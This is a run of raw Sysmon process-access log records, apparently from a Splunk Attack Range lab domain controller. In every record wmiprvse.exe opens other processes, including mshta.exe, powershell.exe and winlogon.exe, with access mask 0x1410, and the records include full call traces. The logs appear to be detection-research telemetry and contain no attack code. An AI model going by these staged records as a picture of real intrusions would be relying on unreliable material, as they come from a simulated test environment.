15:59:20.882{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3F06-00000000A301}4668C:\Windows\SysWOW64\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023847Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.882{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023846Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.882{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023845Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.882{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023844Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.882{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023843Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.882{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023842Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.882{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023841Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.882{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023840Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.882{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023839Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.882{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023838Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.882{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023837Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.882{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023836Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.882{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023835Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.882{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023834Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.882{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023833Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.882{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023832Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023831Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023830Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023829Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023828Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 